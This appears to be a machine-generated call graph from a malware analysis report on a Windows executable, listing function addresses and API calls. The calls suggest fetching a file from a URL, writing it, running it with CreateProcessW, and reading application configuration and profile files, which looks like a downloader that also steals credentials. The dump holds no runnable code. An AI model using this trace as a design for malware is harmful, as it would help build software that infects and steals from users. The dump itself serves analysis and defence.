5826->5825 5827 40a79e Sleep 5826->5827 5826->5828 5827->5826 5829 406cb5 GetVersionExW 5828->5829 5830 40a83f 5829->5830 5831 4078cb 12 API calls 5830->5831 5832 40a873 5831->5832 5833 40a718 5 API calls 5832->5833 5835 40a87b 5833->5835 5834 40a744 5 API calls 5834->5835 5835->5834 5836 40a894 Sleep 5835->5836 5837 406e69 22 API calls 5835->5837 5838 40a8c7 Sleep 5835->5838 5839 40a8e1 GetProcessHeap HeapFree 5835->5839 5836->5835 5837->5835 5838->5835 5839->5740 5905 40584d 5840->5905 5842 407557 Sleep 5842->5770 5844 4073dd SystemTimeToFileTime SystemTimeToFileTime 5843->5844 5846 407432 5844->5846 5847 40745f SetWaitableTimer WaitForSingleObject CloseHandle 5846->5847 5847->5770 5906 406d14 InternetAttemptConnect 5848->5906 5850 40aca4 5851 40aca9 Sleep 5850->5851 5852 40acbd 5850->5852 5853 406d14 2 API calls 5851->5853 5909 4078cb 5852->5909 5853->5850 5855 40acd4 5918 406cb5 GetVersionExW 5855->5918 5857 40ad09 5920 40a718 5857->5920 5861 40ad71 Sleep 5864 40ad4c 5861->5864 5862 40ad9f Sleep 5862->5864 5863 40adbc 5863->5770 5864->5861 5864->5862 5864->5863 5924 40a744 5864->5924 5928 406e69 5864->5928 5866 40b0a3 5865->5866 5867 40b0bd 5866->5867 5868 40b0cf 5866->5868 5895 40b0ae 5866->5895 6034 407995 5867->6034 6041 407951 5868->6041 5871 40b177 InternetClearAllPerSiteCookieDecisions 5874 40b17d 5871->5874 5872 40b168 InternetSetPerSiteCookieDecisionW 5872->5874 5873 40b0cd 5875 40b0fb GetModuleFileNameW 5873->5875 5887 40b155 5873->5887 6062 4032b8 5874->6062 5876 40b116 GetCurrentDirectoryW 5875->5876 5884 40b10d 5875->5884 5876->5884 5879 40b186 GetLastError 5881 40a786 35 API calls 5879->5881 5880 40b196 5882 40b1b0 CreateThread 5880->5882 5883 40b1e1 5880->5883 5881->5880 5882->5880 5886 40b221 5883->5886 5888 40a786 35 API calls 5883->5888 6046 40253c 5884->6046 5889 40b228 CloseHandle 5886->5889 5890 40b23d 5886->5890 5887->5871 5887->5872 5887->5895 5891 40b1f7 5888->5891 5889->5889 5889->5890 5892 40a6c9 InternetCloseHandle 5890->5892 5891->5886 5893 40b212 WaitForMultipleObjects 5891->5893 5894 40b242 InternetClearAllPerSiteCookieDecisions 5892->5894 5893->5886 5894->5895 5896 40b24d 5894->5896 5895->5770 5896->5895 5897 40b261 GetModuleFileNameW 5896->5897 5898 40b27c GetCurrentDirectoryW 5897->5898 5899 40b273 5897->5899 5898->5899 5900 40253c 50 API calls 5899->5900 5900->5895 5904 40a6cf 5901->5904 5902 40a6fc InternetCloseHandle 5902->5904 5903 40a716 ExitProcess 5904->5902 5904->5903 5905->5842 5907 406d22 5906->5907 5908 406d26 InternetOpenW 5906->5908 5907->5850 5908->5850 5940 407e2b 5909->5940 5911 407903 5911->5855 5914 4078ec 5914->5911 5915 4078f4 5914->5915 5952 407d61 5915->5952 5917 407900 5917->5911 5919 406cf6 5918->5919 5919->5857 5921 40a722 5920->5921 5922 40a739 5921->5922 5964 4079ff 5921->5964 5922->5864 5925 40a75d 5924->5925 5926 4079ff 5 API calls 5925->5926 5927 40a76e 5925->5927 5926->5927 5927->5864 5929 40d5b0 5928->5929 5930 406e76 GetTickCount 5929->5930 5931 406e92 5930->5931 5970 407b4e 5931->5970 5933 406f49 5979 409c99 5933->5979 5937 407017 5937->5864 5938 406ff4 5938->5937 5995 407a3c 5938->5995 5941 407e3d 5940->5941 5942 407e4e SetFilePointer ReadFile 5940->5942 5958 407cd7 5941->5958 5944 4078dd 5942->5944 5946 407e7e 5942->5946 5944->5911 5947 40782a GetModuleFileNameW CreateFileW 5944->5947 5945 407e44 5945->5942 5945->5944 5946->5944 5948 407871 GetFileTime CloseHandle 5947->5948 5949 407888 GetTickCount 5947->5949 5950 4078b0 5948->5950 5951 407893 5949->5951 5950->5914 5951->5950 5953 407d70 5952->5953 5955 407d77 5952->5955 5954 407cd7 3 API calls 5953->5954 5954->5955 5956 407d81 5955->5956 5957 407dfa SetFilePointer WriteFile 5955->5957 5956->5917 5957->5917 5959 40d5b0 5958->5959 5960 407ce4 GetModuleFileNameW 5959->5960 5961 407d0d GetCurrentDirectoryW 5960->5961 5962 407d00 5960->5962 5961->5962 5963 407d36 CreateFileW 5962->5963 5963->5945 5967 407908 5964->5967 5966 407a05 5966->5921 5968 407e2b 5 API calls 5967->5968 5969 407919 5968->5969 5969->5966 6005 407267 5970->6005 5972 407b63 5973 407e2b 5 API calls 5972->5973 5974 407b83 5972->5974 5973->5974 5975 407c6b 5974->5975 6010 40bcb4 5974->6010 6020 40bd55 5975->6020 5981 409ca6 5979->5981 5980 409cbb InternetOpenUrlW 5982 409cdf GetProcessHeap HeapAlloc 5980->5982 5983 406fe2 5980->5983 5981->5980 5982->5983 5984 409d5b InternetReadFile 5982->5984 5983->5937 5991 406e00 5983->5991 5985 409d79 GetProcessHeap HeapAlloc 5984->5985 5986 409d0b 5984->5986 5987 409d92 GetProcessHeap HeapFree 5985->5987 5986->5984 5986->5985 5988 409d1f GetProcessHeap HeapReAlloc 5986->5988 5990 40c5d0 __VEC_memcpy 5986->5990 5987->5983 5988->5983 5988->5986 5990->5986 5992 406e12 5991->5992 5993 40c5d0 __VEC_memcpy 5992->5993 5994 406e21 5993->5994 5994->5938 5996 407a4f 5995->5996 5997 40c5d0 __VEC_memcpy 5996->5997 6004 407b42 5996->6004 5998 407a7d 5997->5998 5999 407267 3 API calls 5998->5999 5998->6004 6000 407b17 5999->6000 6001 407267 3 API calls 6000->6001 6002 407b20 6001->6002 6003 407d61 5 API calls 6002->6003 6003->6004 6004->5937 6006 407284 6005->6006 6007 407278 GetSystemTime 6005->6007 6008 40728b SystemTimeToFileTime SystemTimeToFileTime 6006->6008 6007->6008 6009 4072e8 __aulldiv 6008->6009 6009->5972 6012 40bcd3 6010->6012 6011 40bd17 6013 40bd3a 6011->6013 6015 40b51c __VEC_memcpy 6011->6015 6012->6011 6026 40c5d0 6012->6026 6014 40bd4d 6013->6014 6016 40c5d0 __VEC_memcpy 6013->6016 6014->5975 6015->6011 6016->6014 6021 40bd5c 6020->6021 6021->6021 6022 40bd9e 6021->6022 6024 40bcb4 __VEC_memcpy 6021->6024 6023 40bcb4 __VEC_memcpy 6022->6023 6025 407c7c 6023->6025 6024->6022 6025->5933 6027 40c5e8 6026->6027 6028 40c60f __VEC_memcpy 6027->6028 6029 40bcf9 6027->6029 6028->6029 6029->6014 6030 40b51c 6029->6030 6031 40b543 6030->6031 6033 40b552 6030->6033 6032 40c5d0 __VEC_memcpy 6031->6032 6032->6033 6033->6011 6040 4079a2 6034->6040 6035 4079f1 6036 407951 36 API calls 6035->6036 6037 4079fc 6036->6037 6037->5873 6038 407e2b 5 API calls 6038->6040 6040->6035 6040->6038 6069 40791c 6040->6069 6043 407965 6041->6043 6042 407e2b 5 API calls 6042->6043 6043->6042 6044 40798e 6043->6044 6045 40791c 36 API calls 6043->6045 6044->5873 6045->6043 6049 402549 6046->6049 6047 402572 6048 402584 DeleteFileW 6047->6048 6051 40a786 35 API calls 6047->6051 6052 402594 6048->6052 6056 4025ba 6048->6056 6049->6047 6050 406d14 2 API calls 6049->6050 6055 402561 Sleep 6049->6055 6050->6049 6053 402581 6051->6053 6057 4025c1 6052->6057 6058 4025ad Sleep 6052->6058 6075 407036 DeleteFileW CreateFileW 6052->6075 6053->6048 6055->6049 6056->5887 6059 40a786 35 API calls 6057->6059 6061 4025d0 _memset 6057->6061 6058->6052 6058->6056 6059->6061 6060 402630 CreateProcessW 6060->6056 6061->6060 6086 406a68 RegOpenKeyExW 6062->6086 6067 403351 GetProcAddress GetProcAddress GetProcAddress 6068 403386 6067->6068 6068->5879 6068->5880 6070 407d61 5 API calls 6069->6070 6071 407930 6070->6071 6072 407939 GetLastError 6071->6072 6073 407949 6071->6073 6074 40a786 35 API calls 6072->6074 6073->6040 6074->6073 6076 407078 GetLastError 6075->6076 6081 40706b 6075->6081 6077 407095 InternetOpenUrlW 6076->6077 6078 407089 SetEndOfFile 6076->6078 6079 4070c6 InternetQueryDataAvailable 6077->6079 6080 4070b8 CloseHandle 6077->6080 6078->6077 6082 407119 InternetReadFile 6079->6082 6080->6081 6081->6052 6083 407123 CloseHandle InternetCloseHandle 6082->6083 6084 4070ed 6082->6084 6083->6081 6084->6083 6085 4070f2 WriteFile 6084->6085 6085->6082 6087 406a9a 6086->6087 6091 4032c4 6086->6091 6110 4069c0 RegQueryValueExW RegCloseKey 6087->6110 6089 406aaa 6090 4069fd 3 API calls 6089->6090 6089->6091 6090->6091 6092 406adf 6091->6092 6093 406aec 6092->6093 6094 406b11 RegOpenKeyExW 6093->6094 6095 406b34 6094->6095 6103 4032ce 6 API calls 6094->6103 6111 4069c0 RegQueryValueExW RegCloseKey 6095->6111 6097 406b49 6098 406b78 RegOpenKeyExW 6097->6098 6097->6103 6099 406b96 6098->6099 6100 406ba6 6098->6100 6112 4069c0 RegQueryValueExW RegCloseKey 6099->6112 6102 4069fd 3 API calls 6100->6102 6104 406bc3 6100->6104 6102->6104 6103->6067 6103->6068 6104->6103 6105 406c03 RegOpenKeyExW 6104->6105 6106 406c21 6105->6106 6109 406c31 6105->6109 6113 4069c0 RegQueryValueExW RegCloseKey 6106->6113 6108 4069fd 3 API calls 6108->6103 6109->6103 6109->6108 6110->6089 6111->6097 6112->6100 6113->6109 6115 40760a CreateFileW 6114->6115 6116 407622 6114->6116 6115->6116 6117 40762a GetFileSize GetProcessHeap RtlAllocateHeap 6115->6117 6116->5806 6117->6116 6118 407650 ReadFile 6117->6118 6118->6116 6119 40766a 6118->6119 6119->6116 6120 407673 WriteFile SetFilePointer ReadFile SetFilePointer ReadFile 6119->6120 6123 40584d 6120->6123 6122 4076cc SetFilePointer WriteFile CloseHandle CloseHandle 6122->6116 6123->6122 6125 40d53c __VEC_memzero 6124->6125 6125->5811 6126->5819 6127->5816 6849 401006 6850 40101f 6849->6850 6851 407499 5 API calls 6850->6851 6854 4010c1 6850->6854 6852 4010ce 6851->6852 6853 407552 Sleep 6852->6853 6852->6854 6853->6854 6855 409a07 6858 409a14 6855->6858 6856 409a92 6857 409a6d SysAllocString 6857->6856 6858->6856 6858->6857 6859 403287 6860 403292 6859->6860 6861 4032aa 6859->6861 6860->6861 6863 408604 RegOpenKeyExW 6860->6863 6864 408632 6863->6864 6865 40864a GetLastError 6863->6865 6873 4069c0 RegQueryValueExW RegCloseKey 6864->6873 6867 408654 6865->6867 6868 408658 6865->6868 6867->6860 6870 408682 DeleteFileW 6868->6870 6871 40866a 6868->6871 6869 408646 6869->6865 6870->6867 6872 4069fd 3 API calls 6871->6872 6872->6867 6873->6869 6883 40ce08 6884 40ce1a 6883->6884 6886 40ce28 @_EH4_CallFilterFunc@8 6883->6886 6885 40cd66 __except_handler4 5 API calls 6884->6885 6885->6886 6887 409909 6888 409916 6887->6888 6895 409723 6888->6895 6890 409a02 6891 409934 6891->6890 6892 409723 __VEC_memcpy 6891->6892 6893 4099d5 6892->6893 6893->6890 6894 4099de SysAllocString SysAllocString 6893->6894 6894->6890 6896 409733 6895->6896 6897 40c5d0 __VEC_memcpy 6896->6897 6898 409772 6896->6898 6897->6898 6898->6891 6213 4047cc 6214 40821c PathCombineW 6213->6214 6215 4047f1 6214->6215 6216 40483b 6215->6216 6217 404800 6215->6217 6218 404843 6215->6218 6221 408248 8 API calls 6217->6221 6237 4083c4 CreateFileW 6218->6237 6221->6216 6224 404a61 6226 404a79 6224->6226 6227 404a69 VirtualFree 6224->6227 6225 40487b HeapAlloc 6234 404896 6225->6234 6226->6216 6228 404a7f CloseHandle 6226->6228 6227->6226 6228->6216 6229 404a4a 6230 40be3a HeapFree 6229->6230 6231 404a53 6230->6231 6258 40be54 6231->6258 6232 40490c StrStrIA StrStrIA StrStrIA StrStrIA 6232->6234 6234->6229 6234->6232 6236 40c00b 3 API calls 6234->6236 6253 40c3f9 6234->6253 6236->6234 6238 404854 6237->6238 6239 4083ea GetFileSizeEx 6237->6239 6238->6216 6246 40c290 6238->6246 6240 4083f9 6239->6240 6241 40844f CloseHandle 6239->6241 6240->6238 6240->6241 6242 40840e VirtualAlloc 6240->6242 6241->6238 6242->6241 6243 408423 ReadFile 6242->6243 6244 408441 VirtualFree 6243->6244 6245 408439 6243->6245 6244->6241 6245->6238 6245->6244 6247 40486e 6246->6247 6252 40c2b6 6246->6252 6247->6224 6247->6225 6248 40bde1 3 API calls 6248->6252 6249 40c340 6250 40be54 HeapFree 6249->6250 6250->6247 6252->6247 6252->6248 6252->6249 6264 40c05c 6252->6264 6254 40c402 6253->6254 6255 40c407 6253->6255 6254->6234 6256 40c412 wvnsprintfW 6255->6256 6257 40c42e 6256->6257 6257->6234 6260 40be5b 6258->6260 6263 40be73 6258->6263 6259 40be3a HeapFree 6259->6260 6260->6259 6261 40be6d 6260->6261 6260->6263 6262 40be3a HeapFree 6261->6262 6262->6263 6263->6224 6265 40c066 6264->6265 6266 40c06a 6264->6266 6265->6252 6266->6265 6269 40be27 HeapAlloc 6266->6269 6268 40c086 6268->6252 6269->6268 6899 40978d 6900 40979a 6899->6900 6901 409655 __VEC_memcpy 6900->6901 6902 4097b3 6901->6902 6903 4097ba 6902->6903 6904 409655 __VEC_memcpy 6902->6904 6905 4097d6 6904->6905 6906 409805 6905->6906 6907 4097df SysAllocString SysAllocString 6905->6907 6907->6906 6908 402d0e 6909 40267a 122 API calls 6908->6909 6910 402d32 6909->6910 6913 409c6f 6910->6913 6914 402d3a 6913->6914 6915 409c7a SysFreeString 6913->6915 6915->6914 6915->6915 6916 40350f 6917 40821c PathCombineW 6916->6917 6918 403531 6917->6918 6919 40354d 6918->6919 6920 403540 6918->6920 6921 403553 HeapAlloc 6918->6921 6922 4034a8 8 API calls 6920->6922 6921->6919 6923 403576 GetPrivateProfileStringW 6921->6923 6922->6919 6924 403594 6923->6924 6925 40372c 6923->6925 6924->6925 6927 4035a8 HeapAlloc 6924->6927 6926 40be3a HeapFree 6925->6926 6926->6919 6927->6925 6934 4035c5 6927->6934 6928 403627 GetPrivateProfileStringW 6929 403643 GetPrivateProfileIntW 6928->6929 6928->6934 6930 403669 GetPrivateProfileStringW 6929->6930 6929->6934 6931 40368b GetPrivateProfileStringW 6930->6931 6930->6934 6931->6934 6932 403723 6933 40be3a HeapFree 6932->6933 6933->6925 6934->6928 6934->6932 6935 40c3f9 wvnsprintfW 6934->6935 6936 40c00b 3 API calls 6934->6936 6935->6934 6936->6934 6270 40cbd0 6271 40cc08 6270->6271 6272 40cbfb 6270->6272 6274 40cd66 __except_handler4 5 API calls 6271->6274 6288 40cd66 6272->6288 6277 40cc18 __except_handler4 6274->6277 6275 40cc9f 6276 40cc74 __except_handler4 6276->6275 6278 40cc8f 6276->6278 6279 40cd66 __except_handler4 5 API calls 6276->6279 6277->6275 6277->6276 6282 40ccb5 _CallDestructExceptionObject 6277->6282 6280 40cd66 __except_handler4 5 API calls 6278->6280 6279->6278 6280->6275 6296 40ce9a RtlUnwind 6282->6296 6283 40ccf4 __except_handler4 6284 40cd2b 6283->6284 6286 40cd66 __except_handler4 5 API calls 6283->6286 6285 40cd66 __except_handler4 5 API calls 6284->6285 6287 40cd3b @_EH4_CallFilterFunc@8 6285->6287 6286->6284 6289 40cd70 IsDebuggerPresent 6288->6289 6290 40cd6e 6288->6290 6298 40d247 6289->6298 6290->6271 6293 40d0d6 SetUnhandledExceptionFilter UnhandledExceptionFilter 6294 40d0f3 __except_handler4 6293->6294 6295 40d0fb GetCurrentProcess TerminateProcess 6293->6295 6294->6295 6295->6271 6297 40ceaf 6296->6297 6297->6283 6298->6293 6943 40d990 6944 40d993 VirtualQuery 6943->6944 6946 40d9b2 6944->6946 6948 40d7d1 _ValidateScopeTableHandlers _CallDestructExceptionObject __FindPESection 6944->6948 6947 40d9cc GetVersionExA 6946->6947 6946->6948 6947->6948 6299 401652 6300 401665 6299->6300 6304 4016f6 6300->6304 6305 407499 GetLocalTime GetLocalTime GetTimeZoneInformation SystemTimeToFileTime SystemTimeToFileTime 6300->6305 6302 4016da 6303 407552 Sleep 6302->6303 6302->6304 6303->6304 6306 40754f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6305->6306 6306->6302 6949 402214 6952 402233 6949->6952 6950 402319 6951 402386 6950->6951 6957 401c41 6950->6957 6952->6950 6954 408091 3 API calls 6952->6954 6954->6950 6955 402478 6955->6951 6956 408091 3 API calls 6955->6956 6956->6951 6962 401c4e 6957->6962 6958 401e07 6961 407267 3 API calls 6958->6961 6963 401d15 6958->6963 6959 401d0e 6960 407267 3 API calls 6959->6960 6960->6963 6961->6963 6962->6958 6962->6959 6963->6955 6307 402dd5 6310 40267a 6307->6310 6316 40268a 6310->6316 6311 4027dd 6312 4026ee GetTickCount 6312->6316 6315 407552 Sleep 6315->6316 6316->6311 6316->6312 6316->6315 6317 4027e6 OleInitialize 6316->6317 6378 40a8f9 6316->6378 6395 40a469 6317->6395 6319 402806 6325 40280b 6319->6325 6402 40a345 6319->6402 6322 402851 6408 40a65e 6322->6408 6323 40285f 6326 40286e 6323->6326 6411 4072ed GetSystemTime SystemTimeToFileTime SystemTimeToFileTime 6323->6411 6325->6316 6413 409f2b 6326->6413 6329 402884 6330 4028b4 6329->6330 6335 402943 6329->6335 6421 408f26 6329->6421 6333 408f26 10 API calls 6330->6333 6330->6335 6332 402c20 6334 40a65e Sleep 6332->6334 6336 4028ea 6333->6336 6334->6325 6335->6332 6340 4029aa 6335->6340 6446 4089fd 6335->6446 6337 4028f1 6336->6337 6338 402956 6336->6338 6346 402904 SysAllocString 6337->6346 6341 40a65e Sleep 6338->6341 6343 4029e6 6340->6343 6344 4089fd 5 API calls 6340->6344 6341->6335 6342 402a3b 6348 408f26 10 API calls 6342->6348 6349 402a6f 6342->6349 6343->6342 6455 40920a 6343->6455 6344->6343 6347 402927 SysFreeString 6346->6347 6352 40293a 6346->6352 6347->6347 6347->6352 6353 402a62 SysAllocString 6348->6353 6354 408f26 10 API calls 6349->6354 6356 402aa2 6349->6356 6350 402a17 6460 409c49 6350->6460 6352->6335 6440 4091bd 6352->6440 6353->6349 6359 402a95 SysAllocString 6354->6359 6355 402ad1 6361 402b04 6355->6361 6362 408f26 10 API calls 6355->6362 6356->6355 6360 408f26 10 API calls 6356->6360 6359->6356 6364 402ac4 SysAllocString 6360->6364 6363 40a65e Sleep 6361->6363 6365 402af7 SysAllocString 6362->6365 6366 402b0e 6363->6366 6364->6355 6365->6361 6367 409c49 SysAllocString 6366->6367 6368 402b6b 6366->6368 6367->6368 6369 409c49 SysAllocString 6368->6369 6370 402b83 6368->6370 6369->6370 6371 402be3 6370->6371 6372 402bea 6370->6372 6463 408825 6371->6463 6487 408692 6372->6487 6375 402be8 SysFreeString 6375->6332 6377 402c11 SysFreeString 6375->6377 6377->6332 6377->6377 6379 40a906 6378->6379 6380 406d14 2 API calls 6379->6380 6381 40a917 Sleep 6379->6381 6382 40a92c 6379->6382 6380->6379 6381->6379 6383 4078cb 12 API calls 6382->6383 6384 40aa37 6383->6384 6385 406cb5 GetVersionExW 6384->6385 6386 40aa52 6385->6386 6387 40a718 5 API calls 6386->6387 6388 40aa7e 6387->6388 6389 40a744 5 API calls 6388->6389 6391 40aa91 6389->6391 6390 406e69 22 API calls 6390->6391 6391->6390 6392 40aabc Sleep 6391->6392 6393 40aae5 GetProcessHeap HeapFree 6391->6393 6394 40a744 5 API calls 6391->6394 6392->6391 6393->6316 6394->6391 6396 40a479 6395->6396 6399 40a4dc 6396->6399 6401 40a4ef 6396->6401 6503 40a156 6396->6503 6398 40a530 InternetOpenW 6400 40a545 InternetSetOptionW 6398->6400 6398->6401 6399->6398 6399->6401 6400->6401 6401->6319 6403 40a352 6402->6403 6404 40284a 6403->6404 6405 40a442 6403->6405 6520 40a245 6403->6520 6404->6322 6404->6323 6405->6404 6528 40a2d9 6405->6528 6410 40a662 Sleep 6408->6410 6410->6325 6412 40735e __aulldiv 6411->6412 6412->6326 6414 409f37 6413->6414 6415 409f40 GetTickCount 6414->6415 6416 409f5f GetTickCount 6415->6416 6417 409fa7 6416->6417 6418 409f67 PeekMessageW 6416->6418 6417->6329 6419 409f88 Sleep 6418->6419 6420 409f7c DispatchMessageW 6418->6420 6419->6416 6420->6418 6544 40a582 6421->6544 6423 408f35 6424 408f78 SysFreeString 6423->6424 6429 408f3e 6423->6429 6432 408f96 6423->6432 6424->6424 6424->6432 6425 409039 6426 409040 6425->6426 6427 409043 SysFreeString 6425->6427 6428 409058 6425->6428 6426->6427 6427->6429 6430 409091 GetTickCount 6428->6430 6431 40905f 6428->6431 6429->6330 6439 4090ae 6430->6439 6433 40908f 6431->6433 6434 40906a SysAllocString 6431->6434 6432->6425 6435 409025 SysFreeString 6432->6435 6436 409108 SysFreeString 6433->6436 6437 40911b SysFreeString 6433->6437 6434->6431 6435->6432 6436->6436 6436->6437 6437->6429 6438 4090c7 SysAllocString 6438->6439 6439->6433 6439->6438 6441 40a582 2 API calls 6440->6441 6442 4091cc 6441->6442 6443 4091d2 6442->6443 6552 409655 6442->6552 6443->6335 6447 408a1a 6446->6447 6448 408bc4 6447->6448 6450 408c0d VariantClear 6447->6450 6451 408a1e 6447->6451 6452 408b99 SysFreeString 6447->6452 6453 408bab VariantClear 6447->6453 6454 408b6b SysFreeString 6447->6454 6449 408c1c GetTickCount 6448->6449 6448->6451 6449->6451 6450->6451 6451->6340 6452->6447 6453->6447 6453->6448 6454->6447 6459 409217 6455->6459 6456 409295 SysAllocString 6456->6350 6459->6456 6556 408091 6459->6556 6461 409c54 SysAllocString 6460->6461 6462 402a27 SysAllocString SysFreeString 6460->6462 6461->6462 6462->6342 6464 408832 6463->6464 6465 40a469 14 API calls 6464->6465 6467 408857 6465->6467 6466 40885c 6466->6375 6467->6466 6468 40a345 22 API calls 6467->6468 6476 408883 6468->6476 6469 40888a 6471 40a65e Sleep 6469->6471 6470 4088eb 6472 409f2b 5 API calls 6470->6472 6471->6466 6473 4088f6 6472->6473 6474 4089fd 5 API calls 6473->6474 6475 408911 6474->6475 6475->6469 6484 40891f 6475->6484 6476->6469 6476->6470 6564 409301 6476->6564 6478 4089f0 SysFreeString 6480 40a65e Sleep 6480->6484 6481 40a469 14 API calls 6481->6484 6482 40a345 22 API calls 6482->6484 6483 409f2b 5 API calls 6483->6484 6484->6478 6484->6480 6484->6481 6484->6482 6484->6483 6485 409301 7 API calls 6484->6485 6486 4089cd SysFreeString SysFreeString 6485->6486 6486->6484 6488 40a469 14 API calls 6487->6488 6490 4086b1 6488->6490 6489 4086b6 6489->6375 6490->6489 6491 40a345 22 API calls 6490->6491 6492 4086de 6491->6492 6493 4086e5 6492->6493 6494 4086f8 6492->6494 6495 40a65e Sleep 6493->6495 6496 409f2b 5 API calls 6494->6496 6495->6489 6498 408703 6496->6498 6497 40874a CharLowerW SysFreeString 6502 40876c 6497->6502 6498->6497 6499 408811 6501 409f2b 5 API calls 6501->6502 6502->6499 6502->6501 6575 408cb7 6502->6575 6504 40a16a 6503->6504 6507 40a16f 6503->6507 6515 40a0b5 CoInitialize 6504->6515 6509 40a188 SysAllocString 6507->6509 6518 40a057 GetForegroundWindow CoCreateInstance SetForegroundWindow 6507->6518 6511 40a1b8 6509->6511 6510 40a224 6510->6399 6511->6510 6512 40a1ce FindWindowW 6511->6512 6513 40a1e8 GetWindowLongW SetWindowLongW SetWindowPos 6512->6513 6514 40a1de SetParent 6512->6514 6513->6510 6514->6513 6516 40a0cc GetModuleHandleW CreateWindowExW 6515->6516 6517 40a0fd 6516->6517 6517->6507 6519 40a093 6518->6519 6519->6509 6519->6510 6521 40a262 _memset 6520->6521 6522 40a2d6 6520->6522 6523 40a270 SysAllocString SysAllocString 6521->6523 6522->6405 6524 40a2b3 6523->6524 6525 40a2c3 SysFreeString SysFreeString 6524->6525 6534 409fb1 6524->6534 6525->6522 6527 40a2c2 6527->6525 6529 40a2f4 6528->6529 6533 40a2f0 6528->6533 6530 40a313 6529->6530 6531 40a2fe GetProcessHeap HeapFree 6529->6531 6532 409c99 11 API calls 6530->6532 6531->6530 6532->6533 6533->6404 6543 40d258 6534->6543 6536 409fbd GetTickCount 6541 409fd3 6536->6541 6537 409fde GetTickCount 6538 40a030 6537->6538 6539 409fea Sleep 6537->6539 6538->6527 6540 409ff2 PeekMessageW 6539->6540 6540->6541 6542 40a005 DispatchMessageW 6540->6542 6541->6537 6541->6538 6542->6540 6543->6536 6545 40a5a0 6544->6545 6546 40a5a4 6544->6546 6545->6423 6547 40a63f 6546->6547 6550 40a5ae 6546->6550 6548 40a64e SysAllocString 6547->6548 6549 40a63b 6547->6549 6548->6549 6549->6423 6550->6549 6551 40a632 SysFreeString 6550->6551 6551->6549 6554 40966d 6552->6554 6553 4091eb SysFreeString 6553->6443 6554->6553 6555 40c5d0 __VEC_memcpy 6554->6555 6555->6553 6558 40809e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 6556->6558 6557 408212 6557->6459 6558->6557 6560 407f4f 6558->6560 6562 407f5c 6560->6562 6561 407f71 6561->6558 6562->6561 6563 4072ed 3 API calls 6562->6563 6563->6561 6565 409314 6564->6565 6566 40933b CharLowerW 6565->6566 6570 409364 6565->6570 6574 4088de SysFreeString SysFreeString 6565->6574 6567 409351 6566->6567 6568 409362 SysFreeString 6567->6568 6569 409359 SysFreeString 6567->6569 6568->6570 6569->6574 6571 4093ae SysAllocString SysAllocString 6570->6571 6570->6574 6572 4093d7 SysFreeString SysFreeString 6571->6572 6572->6574 6574->6470 6576 408cd2 6575->6576 6577 408f17 VariantClear 6576->6577 6578 408e8f 6576->6578 6579 408cd6 6576->6579 6581 408e6d SysFreeString 6576->6581 6582 408e76 VariantClear 6576->6582 6583 408e2c SysFreeString 6576->6583 6585 409581 6576->6585 6577->6579 6578->6579 6580 408ed5 SysAllocString 6578->6580 6579->6502 6580->6579 6581->6582 6582->6576 6582->6578 6583->6576 6586 409591 6585->6586 6587 409595 6586->6587 6588 409599 CharLowerW 6586->6588 6587->6576 6589 4095fb 6588->6589 6591 4095b3 6588->6591 6590 40960a SysFreeString 6589->6590 6590->6576 6591->6589 6591->6590 6592 4095d5 CharLowerW 6591->6592 6593 4095df 6592->6593 6594 409605 SysFreeString 6593->6594 6594->6590 6964 403e18 6965 40821c PathCombineW 6964->6965 6966 403e3d 6965->6966 6967 403e87 6966->6967 6968 403e4c 6966->6968 6969 403e8f 6966->6969 6971 408248 8 API calls 6968->6971 6970 40c519 4 API calls 6969->6970 6973 403e9c 6970->6973 6971->6967 6972 40c5b9 SysFreeString 6972->6973 6973->6967 6973->6972 6974 40c43d 4 API calls 6973->6974 6975 40c00b 3 API calls 6973->6975 6976 40be3a HeapFree 6973->6976 6974->6973 6975->6973 6976->6973 6977 409a99 6978 409aa6 6977->6978 6979 409723 __VEC_memcpy 6978->6979 6980 409ac4 6979->6980 6981 409b18 6980->6981 6982 409723 __VEC_memcpy 6980->6982 6983 409ae9 6982->6983 6983->6981 6984 409af2 SysAllocString SysAllocString 6983->6984 6984->6981 6985 409f99 Sleep 6986 409fa7 6985->6986 6595 402c62 6604 406c77 RegOpenKeyExW 6595->6604 6597 402c77 6598 406cb5 GetVersionExW 6597->6598 6599 402c7c 6598->6599 6600 40a8f9 34 API calls 6599->6600 6601 402c8f 6600->6601 6602 40267a 122 API calls 6601->6602 6603 402ca8 6602->6603 6605 406c9b 6604->6605 6606 406c9f 6604->6606 6605->6597 6609 4069c0 RegQueryValueExW RegCloseKey 6606->6609 6608 406cb0 6608->6597 6609->6608 6987 40d2a4 6988 40d2ac 6987->6988 6989 40d378 __except_handler3 6988->6989 6993 40d790 6988->6993 6992 40d2e5 __except_handler3 _CallDestructExceptionObject @_EH4_CallFilterFunc@8 6992->6989 6999 40d110 RtlUnwind 6992->6999 6997 40d7e5 _ValidateScopeTableHandlers _CallDestructExceptionObject __FindPESection 6993->6997 6998 40d7d1 _ValidateScopeTableHandlers _CallDestructExceptionObject __FindPESection 6993->6998 6994 40d99d VirtualQuery 6995 40d9b2 6994->6995 6994->6998 6996 40d9cc GetVersionExA 6995->6996 6995->6998 6996->6998 6997->6994 6997->6998 6998->6992 7000 40d128 6999->7000 7000->6992 6610 4053ea HeapCreate 6611 405408 GetProcessHeap 6610->6611 6612 40541c 6610->6612 6611->6612 6629 403740 6612->6629 6630 40375a 6629->6630 6746 40848f RegOpenKeyExW 6630->6746 6633 4037a2 ExpandEnvironmentStringsW 6756 4034a8 6633->6756 6634 403846 6638 40be3a HeapFree 6634->6638 6635 40383c 6760 4033a0 6635->6760 6639 403844 6638->6639 6644 403c10 6639->6644 6640 4037f6 SHGetFolderPathW 6641 4037c3 6640->6641 6641->6640 6642 403837 6641->6642 6643 408248 8 API calls 6641->6643 6642->6634 6642->6635 6643->6641 6645 403c29 6644->6645 6646 40848f 7 API calls 6645->6646 6647 403c6d 6646->6647 6648 403c79 ExpandEnvironmentStringsW 6647->6648 6657 403ca9 6647->6657 6774 4039ea HeapAlloc 6648->6774 6650 403e00 6653 4033a0 HeapFree 6650->6653 6651 403e0a 6654 40be3a HeapFree 6651->6654 6655 403e08 6653->6655 6654->6655 6666 4040e7 6655->6666 6656 403d18 SHGetFolderPathW 6656->6657 6657->6656 6659 408248 8 API calls 6657->6659 6660 403d88 6657->6660 6663 403df7 6657->6663 6791 4039a3 6657->6791 6659->6657 6661 40848f 7 API calls 6660->6661 6660->6663 6662 403dc8 6661->6662 6662->6663 6664 403dd4 ExpandEnvironmentStringsW 6662->6664 6663->6650 6663->6651 